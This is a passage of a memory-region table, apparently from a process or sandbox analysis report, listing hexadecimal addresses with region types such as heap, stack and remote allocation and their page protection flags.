|
heap
|
page read and write
|
||
897000
|
heap
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
56C0000
|
heap
|
page read and write
|
||
60D0000
|
heap
|
page read and write
|
||
6135000
|
heap
|
page read and write
|
||
56BD000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4C10000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
597000
|
heap
|
page read and write
|
||
E10000
|
trusted library allocation
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
2700000
|
heap
|
page read and write
|
||
3412000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
4742000
|
heap
|
page read and write
|
||
375000
|
heap
|
page read and write
|
||
469A000
|
heap
|
page read and write
|
||
442000
|
heap
|
page read and write
|
||
23E000
|
stack
|
page read and write | page guard
|
||
46F000
|
unkown
|
page readonly
|
||
2166000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
9FF7000
|
direct allocation
|
page execute and read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
400000
|
unkown
|
page readonly
|
||
1C49E000
|
heap
|
page read and write
|
||
E00000
|
trusted library allocation
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
A10E000
|
direct allocation
|
page execute and read and write
|
||
4278000
|
remote allocation
|
page execute and read and write
|
||
53E0000
|
heap
|
page read and write
|
||
130000
|
trusted library allocation
|
page read and write
|
||
3403000
|
heap
|
page read and write
|
||
6E8000
|
heap
|
page read and write
|
||
4C0000
|
trusted library allocation
|
page read and write
|
||
21B3000
|
heap
|
page read and write
|
||
7FE8B02C000
|
trusted library allocation
|
page read and write
|
||
2F5000
|
heap
|
page read and write
|
||
9FE7000
|
direct allocation
|
page execute and read and write
|
||
46F000
|
unkown
|
page readonly
|
||
3E23000
|
heap
|
page read and write
|
||
270000
|
direct allocation
|
page read and write
|
||
3412000
|
heap
|
page read and write
|
||
28C000
|
heap
|
page read and write
|
||
35E0000
|
trusted library allocation
|
page read and write
|
||
3900000
|
trusted library allocation
|
page read and write
|
||
221FF000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
7FE89968000
|
trusted library allocation
|
page read and write
|
||
1E40000
|
heap
|
page read and write
|
||
574000
|
heap
|
page read and write
|
||
56EC000
|
heap
|
page read and write
|
||
ED0000
|
trusted library allocation
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
22E6000
|
heap
|
page read and write
|
||
46FD000
|
heap
|
page read and write
|
||
7FE897F0000
|
trusted library allocation
|
page read and write
|
||
7FE895E3000
|
trusted library allocation
|
page read and write
|
||
3E6E000
|
heap
|
page read and write
|
||
494000
|
heap
|
page read and write
|
||
A050000
|
direct allocation
|
page execute and read and write
|
||
44E000
|
heap
|
page read and write
|
||
6F1000
|
heap
|
page read and write
|
||
2240000
|
heap
|
page read and write
|
||
443000
|
heap
|
page read and write
|
||
6178000
|
stack
|
page read and write
|
||
4DCF000
|
stack
|
page read and write
|
||
2700000
|
trusted library allocation
|
page read and write
|
||
541000
|
heap
|
page read and write
|
||
47B000
|
heap
|
page read and write
|
||
1C8E0000
|
heap
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
21D6000
|
heap
|
page read and write
|
||
6374000
|
heap
|
page read and write
|
||
36D000
|
heap
|
page read and write
|
||
2B0000
|
trusted library allocation
|
page read and write
|
||
1BFCF000
|
stack
|
page read and write
|
||
1D64000
|
heap
|
page read and write
|
||
33FF000
|
heap
|
page read and write
|
||
810000
|
direct allocation
|
page read and write
|
||
3A10000
|
trusted library allocation
|
page read and write
|
||
A02D000
|
direct allocation
|
page execute and read and write
|
||
3E5A000
|
heap
|
page read and write
|
||
2FD000
|
heap
|
page read and write
|
||
16C000
|
stack
|
page read and write
|
||
2AC000
|
stack
|
page read and write
|
||
3E73000
|
heap
|
page read and write
|
||
593000
|
heap
|
page read and write
|
||
5FF7000
|
heap
|
page read and write
|
||
68B000
|
heap
|
page read and write
|
||
EB0000
|
direct allocation
|
page read and write
|
||
EC0000
|
trusted library allocation
|
page read and write
|
||
2D42000
|
trusted library allocation
|
page read and write
|
||
42F000
|
unkown
|
page read and write
|
||
482F000
|
heap
|
page read and write
|
||
61F0000
|
heap
|
page read and write
|
||
1C40000
|
heap
|
page read and write
|
||
593000
|
heap
|
page read and write
|
||
6112000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
1C9D000
|
heap
|
page read and write
|
||
169000
|
heap
|
page read and write
|
||
2D33000
|
trusted library allocation
|
page read and write
|
||
B80000
|
heap
|
page read and write
|
||
297A000
|
trusted library allocation
|
page read and write
|
||
120000
|
trusted library section
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
F5F000
|
stack
|
page read and write
|
||
56A1000
|
heap
|
page read and write
|
||
498B000
|
stack
|
page read and write
|
||
7FE895D3000
|
trusted library allocation
|
page execute and read and write
|
||
36D000
|
heap
|
page read and write
|
||
569F000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
3414000
|
heap
|
page read and write
|
||
55B5000
|
heap
|
page read and write
|
||
4861000
|
heap
|
page read and write
|
||
1A8DB000
|
stack
|
page read and write
|
||
6BF000
|
heap
|
page read and write
|
||
3A4000
|
heap
|
page read and write
|
||
303000
|
trusted library allocation
|
page read and write
|
||
336000
|
heap
|
page read and write
|
||
186000
|
heap
|
page read and write
|
||
6A30000
|
heap
|
page read and write
|
||
A003000
|
direct allocation
|
page execute and read and write
|
||
170000
|
heap
|
page read and write
|
||
283F000
|
stack
|
page read and write
|
||
61AB000
|
heap
|
page read and write
|
||
1CA5000
|
heap
|
page read and write
|
||
86D000
|
trusted library allocation
|
page read and write
|
||
4708000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
81A000
|
trusted library allocation
|
page read and write
|
||
23B000
|
stack
|
page read and write
|
||
4F3C000
|
heap
|
page read and write
|
||
2C28000
|
trusted library allocation
|
page read and write
|
||
515F000
|
stack
|
page read and write
|
||
611E000
|
heap
|
page read and write
|
||
7FE89990000
|
trusted library allocation
|
page read and write
|
||
5C94000
|
heap
|
page read and write
|
||
1C0000
|
trusted library allocation
|
page read and write
|
||
325000
|
heap
|
page read and write
|
||
3475000
|
trusted library allocation
|
page read and write
|
||
439000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
33F5000
|
heap
|
page read and write
|
||
E70000
|
trusted library allocation
|
page read and write
|
||
A11A000
|
direct allocation
|
page execute and read and write
|
||
465000
|
heap
|
page read and write
|
||
7FE895DD000
|
trusted library allocation
|
page execute and read and write
|
||
4A0000
|
heap
|
page read and write
|
||
5C13000
|
heap
|
page read and write
|
||
4DE000
|
heap
|
page read and write
|
||
243F000
|
stack
|
page read and write
|
||
25DE000
|
stack
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
4D6000
|
heap
|
page read and write
|
||
557000
|
heap
|
page read and write
|
||
4F7C000
|
stack
|
page read and write
|
||
A066000
|
direct allocation
|
page execute and read and write
|
||
56B7000
|
heap
|
page read and write
|
||
2940000
|
trusted library allocation
|
page read and write
|
||
250E000
|
stack
|
page read and write
|
||
60B3000
|
heap
|
page read and write
|
||
33F3000
|
heap
|
page read and write
|
||
3C89000
|
trusted library allocation
|
page read and write
|
||
237E000
|
heap
|
page read and write
|
||
4F79000
|
heap
|
page read and write
|
||
4BAE000
|
stack
|
page read and write
|
||
21E9000
|
heap
|
page read and write
|
||
3AB6000
|
trusted library allocation
|
page read and write
|
||
7FE89783000
|
trusted library allocation
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
7FE8B220000
|
trusted library allocation
|
page read and write
|
||
46F7000
|
heap
|
page read and write
|
||
177000
|
direct allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4CA000
|
heap
|
page read and write
|
||
2588000
|
trusted library allocation
|
page read and write
|
||
4850000
|
trusted library allocation
|
page read and write
|
||
359000
|
heap
|
page read and write
|
||
1EB0000
|
heap
|
page read and write
|
||
1E00000
|
heap
|
page read and write
|
||
2700000
|
heap
|
page read and write
|
||
9B0000
|
direct allocation
|
page read and write
|
||
6061000
|
heap
|
page read and write
|
||
A007000
|
direct allocation
|
page execute and read and write
|
||
4887000
|
heap
|
page read and write
|
||
1F70000
|
heap
|
page read and write
|
||
3284000
|
trusted library allocation
|
page read and write
|
||
2700000
|
heap
|
page read and write
|
||
375000
|
heap
|
page read and write
|
||
3CC000
|
heap
|
page read and write
|
||
447000
|
heap
|
page read and write
|
||
56D000
|
heap
|
page read and write
|
||
3E3B000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
4B4F000
|
stack
|
page read and write
|
||
3E69000
|
heap
|
page read and write
|
||
3275000
|
trusted library allocation
|
page read and write
|
||
3AD000
|
heap
|
page read and write
|
||
3E76000
|
heap
|
page read and write
|
||
309000
|
heap
|
page read and write
|
||
412000
|
heap
|
page read and write
|
||
7FE8B1A0000
|
trusted library allocation
|
page read and write
|
||
900000
|
trusted library allocation
|
page read and write
|
||
6BF000
|
heap
|
page read and write
|
||
5BB4000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
A085000
|
direct allocation
|
page execute and read and write
|
||
3ED000
|
stack
|
page read and write
|
||
4794000
|
heap
|
page read and write
|
||
55C000
|
heap
|
page read and write
|
||
5BB0000
|
trusted library allocation
|
page read and write
|
||
3410000
|
heap
|
page read and write
|
||
183000
|
stack
|
page read and write
|
||
4A69000
|
heap
|
page read and write
|
||
7FE8B040000
|
trusted library allocation
|
page execute and read and write
|
||
509E000
|
stack
|
page read and write | page guard
|
||
41F000
|
system
|
page execute and read and write
|
||
400000
|
unkown
|
page readonly
|
||
1A808000
|
stack
|
page read and write
|
||
260000
|
direct allocation
|
page read and write
|
||
603D000
|
heap
|
page read and write
|
||
4F04000
|
heap
|
page read and write
|
||
30B000
|
heap
|
page read and write
|
||
A0A3000
|
direct allocation
|
page execute and read and write
|
||
4BD000
|
heap
|
page read and write
|
||
3E7E000
|
heap
|
page read and write
|
||
63D9000
|
heap
|
page read and write
|
||
33D6000
|
heap
|
page read and write
|
||
1940000
|
remote allocation
|
page execute and read and write
|
||
7FE8AE72000
|
trusted library allocation
|
page read and write
|
||
4CA8000
|
heap
|
page read and write
|
||
7FE8968C000
|
trusted library allocation
|
page execute and read and write
|
||
319000
|
heap
|
page read and write
|
||
2948000
|
trusted library allocation
|
page read and write
|
||
5859000
|
heap
|
page read and write
|
||
56B7000
|
heap
|
page read and write
|
||
8D000
|
stack
|
page read and write
|
||
5B03000
|
heap
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
337000
|
heap
|
page read and write
|
||
4F3D000
|
heap
|
page read and write
|
||
79F000
|
stack
|
page read and write
|
||
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
2E9000
|
heap
|
page read and write
|
||
1B1BC000
|
stack
|
page read and write
|
||
48E000
|
heap
|
page read and write
|
||
414000
|
heap
|
page read and write
|
||
7FE8AE83000
|
trusted library allocation
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
2703000
|
trusted library allocation
|
page read and write
|
||
4868000
|
heap
|
page read and write
|
||
6C5000
|
heap
|
page read and write
|
||
2819000
|
trusted library allocation
|
page read and write
|
||
56CE000
|
heap
|
page read and write
|
||
8D000
|
stack
|
page read and write
|
||
A03A000
|
direct allocation
|
page execute and read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
5544000
|
heap
|
page read and write
|
||
554E000
|
stack
|
page read and write
|
||
1B2E4000
|
heap
|
page read and write
|
||
E80000
|
trusted library allocation
|
page read and write
|
||
37E000
|
heap
|
page read and write
|
||
D2E000
|
stack
|
page read and write
|
||
287E000
|
stack
|
page read and write
|
||
340A000
|
heap
|
page read and write
|
||
B83000
|
heap
|
page read and write
|
||
221B000
|
heap
|
page read and write
|
||
31A000
|
heap
|
page read and write
|
||
6084000
|
heap
|
page read and write
|
||
4FA0000
|
heap
|
page read and write
|
||
1CAFE000
|
stack
|
page read and write
|
||
554E000
|
heap
|
page read and write
|
||
3704000
|
heap
|
page read and write
|
||
3410000
|
heap
|
page read and write
|
||
7FE8B060000
|
trusted library allocation
|
page execute and read and write
|
||
3E3C000
|
heap
|
page read and write
|
||
E44000
|
heap
|
page execute and read and write
|
||
A04C000
|
direct allocation
|
page execute and read and write
|
||
593000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
7FE8B200000
|
trusted library allocation
|
page read and write
|
||
23A0000
|
heap
|
page execute and read and write
|
||
7FE89890000
|
trusted library allocation
|
page read and write
|
||
230000
|
heap
|
page read and write
|
||
1F40000
|
heap
|
page read and write
|
||
236C000
|
stack
|
page read and write
|
||
56CF000
|
heap
|
page read and write
|
||
32E000
|
heap
|
page read and write
|
||
4852000
|
heap
|
page read and write
|
||
45E000
|
heap
|
page read and write
|
||
2F9A000
|
stack
|
page read and write
|
||
5D9F000
|
stack
|
page read and write
|
||
5D9E000
|
stack
|
page read and write | page guard
|
||
33F7000
|
heap
|
page read and write
|
||
35B000
|
heap
|
page read and write
|
||
8C3000
|
trusted library allocation
|
page read and write
|
||
39D000
|
heap
|
page read and write
|
||
2233E000
|
stack
|
page read and write
|
||
2A12000
|
trusted library allocation
|
page read and write
|
||
4C0D000
|
stack
|
page read and write
|
||
F10000
|
trusted library allocation
|
page read and write
|
||
12464000
|
trusted library allocation
|
page read and write
|
||
483000
|
heap
|
page read and write
|
||
573000
|
heap
|
page read and write
|
||
48C0000
|
heap
|
page read and write
|
||
2480000
|
heap
|
page read and write
|
||
21CD0000
|
trusted library allocation
|
page read and write
|
||
1A9C3000
|
heap
|
page read and write
|
||
4661000
|
heap
|
page read and write
|
||
B8D000
|
heap
|
page read and write
|
||
6090000
|
heap
|
page read and write
|
||
5BCC000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
26CF000
|
trusted library allocation
|
page read and write
|
||
3AB7000
|
trusted library allocation
|
page read and write
|
||
5C7D000
|
heap
|
page read and write
|
||
51AA000
|
heap
|
page read and write
|
||
4852000
|
heap
|
page read and write
|
||
1CB6000
|
heap
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
8B0000
|
trusted library allocation
|
page execute and read and write
|
||
150000
|
trusted library allocation
|
page read and write
|
||
255E000
|
trusted library allocation
|
page read and write
|
||
A0B5000
|
direct allocation
|
page execute and read and write
|
||
35F000
|
heap
|
page read and write
|
||
2277000
|
heap
|
page read and write
|
||
7FFFFF88000
|
trusted library allocation
|
page readonly
|
||
5557000
|
heap
|
page read and write
|
||
2D33000
|
trusted library allocation
|
page read and write
|
||
56CE000
|
heap
|
page read and write
|
||
4C89000
|
heap
|
page read and write
|
||
A02F000
|
direct allocation
|
page execute and read and write
|
||
1DE8000
|
heap
|
page read and write
|
||
465000
|
heap
|
page read and write
|
||
4BCF000
|
stack
|
page read and write
|
||
686000
|
heap
|
page read and write
|
||
4A6C000
|
heap
|
page read and write
|
||
2217D000
|
stack
|
page read and write
|
||
7FE89880000
|
trusted library allocation
|
page read and write
|
||
56B0000
|
heap
|
page read and write
|
||
392000
|
heap
|
page read and write
|
||
569F000
|
heap
|
page read and write
|
||
6CC000
|
heap
|
page read and write
|
||
1A82E000
|
stack
|
page read and write
|
||
48C0000
|
heap
|
page read and write
|
||
3286000
|
trusted library allocation
|
page read and write
|
||
21C000
|
stack
|
page read and write
|
||
170000
|
trusted library section
|
page read and write
|
||
28C6000
|
trusted library allocation
|
page read and write
|
||
46B0000
|
heap
|
page read and write
|
||
5550000
|
heap
|
page read and write
|
||
2623000
|
trusted library allocation
|
page read and write
|
||
2A09000
|
trusted library allocation
|
page read and write
|
||
48F9000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
160000
|
trusted library section
|
page read and write
|
||
4FF000
|
stack
|
page read and write
|
||
1B61E000
|
stack
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
56B5000
|
heap
|
page read and write
|
||
1ABD9000
|
stack
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4C7000
|
direct allocation
|
page read and write
|
||
6A7A000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
2D42000
|
trusted library allocation
|
page read and write
|
||
56A1000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
574000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
569F000
|
heap
|
page read and write
|
||
4BD000
|
heap
|
page read and write
|
||
3414000
|
heap
|
page read and write
|
||
3D0000
|
trusted library allocation
|
page read and write
|
||
4856000
|
heap
|
page read and write
|
||
46A2000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
401000
|
unkown
|
page execute read
|
||
7BF000
|
heap
|
page read and write
|
||
3403000
|
heap
|
page read and write
|
||
372000
|
heap
|
page read and write
|
||
35FA000
|
trusted library allocation
|
page read and write
|
||
3AC000
|
heap
|
page read and write
|
||
1C2000
|
trusted library allocation
|
page read and write
|
||
47B0000
|
heap
|
page execute and read and write
|
||
4F7E000
|
stack
|
page read and write
|
||
2AEC000
|
trusted library allocation
|
page read and write
|
||
3375000
|
heap
|
page read and write
|
||
55C000
|
heap
|
page read and write
|
||
1E63000
|
direct allocation
|
page read and write
|
||
4741000
|
heap
|
page read and write
|
||
1BED000
|
heap
|
page read and write
|
||
250000
|
heap
|
page read and write
|
||
5B5000
|
heap
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
5C4E000
|
heap
|
page read and write
|
||
22FF000
|
stack
|
page read and write
|
||
7FE8B120000
|
trusted library allocation
|
page read and write
|
||
3A0000
|
heap
|
page read and write
|
||
24B0000
|
trusted library allocation
|
page read and write
|
||
288000
|
trusted library allocation
|
page read and write
|
||
41F000
|
system
|
page execute and read and write
|
||
21E60000
|
heap
|
page read and write
|
||
5C6000
|
heap
|
page read and write
|
||
3CE000
|
heap
|
page read and write
|
||
312A000
|
trusted library allocation
|
page read and write
|
||
5656000
|
heap
|
page read and write
|
||
4AE000
|
heap
|
page read and write
|
||
290000
|
heap
|
page read and write
|
||
12531000
|
trusted library allocation
|
page read and write
|
||
B00000
|
trusted library allocation
|
page execute and read and write
|
||
4660000
|
heap
|
page read and write
|
||
33F0000
|
heap
|
page read and write
|
||
6C5000
|
heap
|
page read and write
|
||
328A000
|
trusted library allocation
|
page read and write
|
||
1B2E0000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
574000
|
heap
|
page read and write
|
||
89000
|
stack
|
page read and write
|
||
9FF1000
|
direct allocation
|
page execute and read and write
|
||
372000
|
heap
|
page read and write
|
||
3375000
|
heap
|
page read and write
|
||
5540000
|
heap
|
page read and write
|
||
47E3000
|
heap
|
page read and write
|
||
2A0B000
|
trusted library allocation
|
page read and write
|
||
4FD000
|
heap
|
page read and write
|
||
569F000
|
heap
|
page read and write
|
||
5D42000
|
heap
|
page read and write
|
||
554D000
|
heap
|
page read and write
|
||
61E6000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
48DA000
|
heap
|
page read and write
|
||
7FFFFF84000
|
trusted library allocation
|
page readonly
|
||
2213C000
|
stack
|
page read and write
|
||
5548000
|
heap
|
page read and write
|
||
35FD000
|
trusted library allocation
|
page read and write
|
||
560000
|
heap
|
page read and write
|
||
28AF000
|
stack
|
page read and write
|
||
7FE89830000
|
trusted library allocation
|
page read and write
|
||
4D90000
|
heap
|
page read and write
|
||
A0FD000
|
direct allocation
|
page execute and read and write
|
||
4B8000
|
heap
|
page read and write
|
||
31B4000
|
trusted library allocation
|
page read and write
|
||
3E5000
|
heap
|
page read and write
|
||
7FFFFF81000
|
trusted library allocation
|
page execute read
|
||
379000
|
heap
|
page read and write
|
||
5656000
|
heap
|
page read and write
|
||
36B000
|
heap
|
page read and write
|
||
A0A9000
|
direct allocation
|
page execute and read and write
|
||
A071000
|
direct allocation
|
page execute and read and write
|
||
33F3000
|
heap
|
page read and write
|
||
2C0000
|
direct allocation
|
page read and write
|
||
2B1C000
|
trusted library allocation
|
page read and write
|
||
8D5000
|
trusted library allocation
|
page execute and read and write
|
||
3CD0000
|
trusted library allocation
|
page read and write
|
||
9D0000
|
heap
|
page execute and read and write
|
||
616E000
|
stack
|
page read and write
|
||
23A000
|
heap
|
page read and write
|
||
2EE000
|
stack
|
page read and write
|
||
2941000
|
trusted library allocation
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
1BEB000
|
heap
|
page read and write
|
||
6D4000
|
heap
|
page read and write
|
||
510000
|
heap
|
page execute and read and write
|
||
1ACDC000
|
stack
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
9B0000
|
trusted library allocation
|
page execute and read and write
|
||
1CBFE000
|
stack
|
page read and write
|
||
48A0000
|
heap
|
page read and write
|
||
1A78000
|
remote allocation
|
page execute and read and write
|
||
2D39000
|
trusted library allocation
|
page read and write
|
||
2CC0000
|
trusted library allocation
|
page read and write
|
||
4852000
|
heap
|
page read and write
|
||
5550000
|
heap
|
page read and write
|
||
56AD000
|
heap
|
page read and write
|
||
29BD000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
5CAE000
|
stack
|
page read and write
|
||
46C9000
|
heap
|
page read and write
|
||
2C24000
|
trusted library allocation
|
page read and write
|
||
7FE8B023000
|
trusted library allocation
|
page read and write
|
||
638F000
|
heap
|
page read and write
|
||
537E000
|
stack
|
page read and write
|
||
26EF000
|
stack
|
page read and write
|
||
478C000
|
heap
|
page read and write
|
||
597000
|
heap
|
page read and write
|
||
555E000
|
stack
|
page read and write
|
||
1CAA000
|
heap
|
page read and write
|
||
A0AF000
|
direct allocation
|
page execute and read and write
|
||
1DBE000
|
stack
|
page read and write
|
||
990000
|
direct allocation
|
page read and write
|
||
2477000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
130000
|
direct allocation
|
page read and write
|
||
4858000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
650000
|
heap
|
page read and write
|
||
60BE000
|
stack
|
page read and write
|
||
48A000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
38E000
|
stack
|
page read and write
|
||
482F000
|
heap
|
page read and write
|
||
7FE898A0000
|
trusted library allocation
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
3BC000
|
heap
|
page read and write
|
||
61F9000
|
heap
|
page read and write
|
||
492E000
|
stack
|
page read and write
|
||
554B000
|
heap
|
page read and write
|
||
5B0F000
|
heap
|
page read and write
|
||
61A000
|
heap
|
page read and write
|
||
4790000
|
heap
|
page read and write
|
||
2F55000
|
trusted library allocation
|
page read and write
|
||
A104000
|
direct allocation
|
page execute and read and write
|
||
6C6000
|
heap
|
page read and write
|
||
1C304000
|
heap
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
1AFA4000
|
heap
|
page read and write
|
||
2FE000
|
stack
|
page read and write
|
||
21EC0000
|
heap
|
page read and write
|
||
45C000
|
unkown
|
page readonly
|
||
557000
|
heap
|
page read and write
|
||
3E6F000
|
heap
|
page read and write
|
||
65F000
|
heap
|
page read and write
|
||
6A37000
|
heap
|
page read and write
|
||
2A9000
|
heap
|
page read and write
|
||
1C12F000
|
stack
|
page read and write
|
||
2450000
|
trusted library allocation
|
page read and write
|
||
434000
|
trusted library allocation
|
page read and write
|
||
4B2B000
|
stack
|
page read and write
|
||
2F65000
|
trusted library allocation
|
page read and write
|
||
3E7E000
|
heap
|
page read and write
|
||
2123000
|
heap
|
page read and write
|
||
16F000
|
trusted library allocation
|
page read and write
|
||
29A000
|
heap
|
page read and write
|
||
25EF000
|
stack
|
page read and write
|
||
315000
|
heap
|
page read and write
|
||
21D3000
|
heap
|
page read and write
|
||
585E000
|
heap
|
page read and write
|
||
4F75000
|
heap
|
page read and write
|
||
344000
|
heap
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
3374000
|
heap
|
page read and write
|
||
1D90000
|
direct allocation
|
page read and write
|
||
3E8E000
|
heap
|
page read and write
|
||
5B62000
|
heap
|
page read and write
|
||
48DC000
|
stack
|
page read and write
|
||
970000
|
trusted library allocation
|
page read and write
|
||
26BF000
|
stack
|
page read and write
|
||
3419000
|
heap
|
page read and write
|
||
4A3000
|
unkown
|
page readonly
|
||
1ABC2000
|
heap
|
page read and write
|
||
33BC000
|
heap
|
page read and write
|
||
370000
|
heap
|
page read and write
|
||
48F9000
|
heap
|
page read and write
|
||
80FF000
|
stack
|
page read and write
|
||
EE0000
|
direct allocation
|
page read and write
|
||
55C000
|
heap
|
page read and write
|
||
2528000
|
heap
|
page read and write
|
||
6BC000
|
heap
|
page read and write
|
||
56AD000
|
heap
|
page read and write
|
||
2700000
|
heap
|
page read and write
|
||
56A000
|
heap
|
page read and write
|
||
5866000
|
heap
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
246F000
|
stack
|
page read and write
|
||
6AE000
|
heap
|
page read and write
|
||
5BD8000
|
heap
|
page read and write
|
||
3D9C000
|
heap
|
page read and write
|
||
620A000
|
heap
|
page read and write
|
||
6159000
|
heap
|
page read and write
|
||
574000
|
heap
|
page read and write
|
||
7FE8B179000
|
trusted library allocation
|
page read and write
|
||
27F0000
|
trusted library allocation
|
page read and write
|
||
28E7000
|
trusted library allocation
|
page read and write
|
||
A056000
|
direct allocation
|
page execute and read and write
|
||
974000
|
heap
|
page read and write
|
||
565D000
|
heap
|
page read and write
|
||
7FE89930000
|
trusted library allocation
|
page read and write
|
||
370000
|
heap
|
page read and write
|
||
5B9D000
|
heap
|
page read and write
|
||
631000
|
heap
|
page read and write
|
||
341E000
|
heap
|
page read and write
|
||
320000
|
heap
|
page read and write
|
||
56CE000
|
heap
|
page read and write
|
||
6E4000
|
heap
|
page read and write
|
||
3AC0000
|
heap
|
page read and write
|
||
1F6D000
|
heap
|
page read and write
|
||
1C54E000
|
heap
|
page read and write
|
||
3FE000
|
heap
|
page read and write
|
||
920000
|
trusted library allocation
|
page read and write
|
||
5656000
|
heap
|
page read and write
|
||
2140000
|
heap
|
page read and write
|
||
2D3F000
|
trusted library allocation
|
page read and write
|
||
1F7000
|
heap
|
page read and write
|
||
51D000
|
heap
|
page read and write
|
||
3878000
|
remote allocation
|
page execute and read and write
|
||
194000
|
trusted library allocation
|
page read and write
|
||
61FE000
|
heap
|
page read and write
|
||
506B000
|
stack
|
page read and write
|
||
3E23000
|
heap
|
page read and write
|
||
A09D000
|
direct allocation
|
page execute and read and write
|
||
45C000
|
unkown
|
page readonly
|
||
3E6A000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
5CAC000
|
heap
|
page read and write
|
||
27DE000
|
stack
|
page read and write
|
||
575000
|
heap
|
page read and write
|
||
46A2000
|
heap
|
page read and write
|
||
18D000
|
direct allocation
|
page read and write
|
||
CC0000
|
trusted library allocation
|
page read and write
|
||
1A420000
|
heap
|
page read and write
|
||
800000
|
trusted library allocation
|
page read and write
|
||
2421000
|
trusted library allocation
|
page read and write
|
||
56B0000
|
heap
|
page read and write
|
||
60E3000
|
heap
|
page read and write
|
||
3BB0000
|
trusted library allocation
|
page read and write
|
||
361000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
2940000
|
trusted library allocation
|
page read and write
|
||
4A70000
|
heap
|
page execute and read and write
|
||
173000
|
direct allocation
|
page read and write
|
||
3E0F000
|
heap
|
page read and write
|
||
F8E000
|
stack
|
page read and write
|
||
8C0000
|
trusted library allocation
|
page read and write
|
||
328D000
|
trusted library allocation
|
page read and write
|
||
2223E000
|
stack
|
page read and write
|
||
3AB000
|
direct allocation
|
page read and write
|
||
1CA1000
|
heap
|
page read and write
|
||
3E71000
|
heap
|
page read and write
|
||
310000
|
heap
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
2173000
|
heap
|
page read and write
|
||
174000
|
heap
|
page read and write
|
||
A0AD000
|
direct allocation
|
page execute and read and write
|
||
47C0000
|
heap
|
page read and write
|
||
219F000
|
stack
|
page read and write
|
||
3CE000
|
heap
|
page read and write
|
||
989000
|
trusted library allocation
|
page read and write
|
||
1C1AD000
|
stack
|
page read and write
|
||
1A9C6000
|
heap
|
page read and write
|
||
36D000
|
heap
|
page read and write
|
||
7FE8B030000
|
trusted library allocation
|
page execute and read and write
|
||
418000
|
unkown
|
page read and write
|
||
5FA000
|
heap
|
page read and write
|
||
2700000
|
trusted library allocation
|
page read and write
|
||
1E30000
|
direct allocation
|
page read and write
|
||
46F000
|
unkown
|
page readonly
|
||
568F000
|
heap
|
page read and write
|
||
7FE895E0000
|
trusted library allocation
|
page read and write
|
||
28D0000
|
trusted library allocation
|
page read and write
|
||
3E5000
|
heap
|
page read and write
|
||
56CC000
|
heap
|
page read and write
|
||
3FE000
|
stack
|
page read and write
|
||
46F6000
|
heap
|
page read and write
|
||
36F0000
|
heap
|
page read and write
|
||
3450000
|
trusted library allocation
|
page read and write
|
||
5B3E000
|
heap
|
page read and write
|
||
5CDB000
|
heap
|
page read and write
|
||
1C61000
|
heap
|
page read and write
|
||
4887000
|
heap
|
page read and write
|
||
682000
|
heap
|
page read and write
|
||
3410000
|
heap
|
page read and write
|
||
3403000
|
heap
|
page read and write
|
||
48FB000
|
heap
|
page read and write
|
||
681000
|
heap
|
page read and write
|
||
1E44000
|
heap
|
page read and write
|
||
1E2C000
|
heap
|
page read and write
|
||
50F000
|
heap
|
page read and write
|
||
2F0000
|
heap
|
page read and write
|
||
56B7000
|
heap
|
page read and write
|
||
1BA000
|
trusted library allocation
|
page execute and read and write
|
||
6D5000
|
heap
|
page read and write
|
||
36B000
|
heap
|
